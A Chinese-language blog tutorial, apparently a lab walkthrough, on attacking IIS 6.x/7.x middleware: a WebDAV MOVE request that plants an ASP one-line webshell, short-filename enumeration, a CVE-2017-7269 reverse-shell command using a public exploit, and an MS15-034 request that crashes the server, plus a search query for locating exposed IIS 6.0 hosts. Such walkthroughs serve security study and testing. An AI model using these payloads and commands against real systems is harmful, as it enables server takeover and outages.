当前位置: 首页 > news >正文

中间件框架漏洞攻略

中间件(英语:Middleware)是提供系统软件和应⽤软件之间连接的软件,以便于软件各部件之间的沟通。    

 中间件处在操作系统和更⾼⼀级应⽤程序之间。他充当的功能是:将应⽤程序运⾏环境与操作系统隔离,从⽽实现应⽤程序开发者不必为更多系统问题忧虑,⽽直接关注该应⽤程序在解决问题上的能⼒ 。容器就是中间件的⼀种。

也就是说,关于中间件,我们可以理解为:是⼀类能够为⼀种或多种应⽤程序合作互通、资源共享,同时还能够为该应⽤程序提供相关的服务的软件。(注意:中间件是⼀类软件的总称,不是单独的⼀个软件)。

IIS(IIS6.x)

PUT漏洞

IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传。

环境

fofa:"IIS-6.0"

本地搭建2003 server

开启 WebDAV 和写权限

打开网址,直接抓包 

 发送重放器,修改代码

MOVE /1.txt HTTP/1.1
Host:192.168.80.132
Destination:http://192.168.80.132/shell.asp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 25

<%eval request("cmd")%>

发送后生成shell.jsp 

 可以使用http://192.168.80.132/shell.asp访问

使用菜⼑,蚁剑连接即可

IIS短⽂件漏洞

开启IIS6.0 ASP.NET

Windows 以 8.3 格式⽣成与 MS-DOS 兼容的(短)⽂件名,以允许基于 MS-DOS 或 16位 Windows的程序访问这些⽂件。在cmd下输⼊"dir /x"即可看到短⽂件名的效果

 

创建1223213113.txt 

 

访问:http://upload.moonteam.com/*~1*/a.asp   开始尝试

之后一位一位试就可以了 ,出现无法找到该页,为正确

尝试后缀名

​​ 之后一位一位试就可以了 ,出现无法找到该页,为正确

IIS RCE-CVE-2017-7269

Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If:<http:// 开头的⻓标头执⾏任意代码 PROPFIND请求

WiNdows Server 2003 R2上使⽤IIS6.0并开启 WebDAV扩展。

利⽤⼯具

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

 反弹shell

将工具放到kali

python2 '/home/kali/Desktop/iis6 reverse shell' 192.168.80.132 80 192.168.80.129 6666

IIS   (llS7.x)

HTTP.SYS远程代码执⾏(MS15-034)  MS-->Microsoft 2015 -034

HTTP SYS是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引 ⼊,IIS服务进程依赖HTTP.SY

HTTP.SYS远程代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的 Windows系统发送 特殊设计的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,成功利⽤此漏洞的攻击者可以在系统 帐户的上下⽂中执⾏任意代码。

主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这个漏洞。

环境

windows server 2012 IIS8.5

在主页面右击,点击复制图片链接(后面用)

 使用工具

下载: https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

 python IISDoS.py  

 返回window后出现蓝屏

 


http://www.mrgr.cn/news/95700.html

相关文章:

  • C++友元:跨墙访问的三种姿势
  • C/C++蓝桥杯算法真题打卡(Day10)
  • Android 系统进程启动Activity方法说明
  • C++——引用
  • 【前端工程化】
  • (UI自动化测试web端)第二篇:元素定位的方法_name定位
  • 快速部署Samba共享服务器作为k8s后端存储
  • 3. 轴指令(omron 机器自动化控制器)——>MC_SetPosition
  • Python中json和jsonify的使用
  • 2025前端面试题记录
  • RabbitMQ八股文
  • 【解决方法】VMwareWorkstation无法连接到虚拟机。请确保您有权运行该程序、访问该程序使用的所有目录以及访问所有临时文件目录。
  • Ubuntu部署Docker搭建靶场
  • 练习用Jupyter使用selenium【疑问未解决版】
  • 【MySQL】基本查询(表的增删查改+聚合函数)
  • PostgreSQL_数据使用与日数据分享
  • 网络层之IP协议
  • Pytorch中的torch.utils.data.Dataset 类
  • 开发中常用的设计模式 用法及注意事项【面试题】
  • Flink启动任务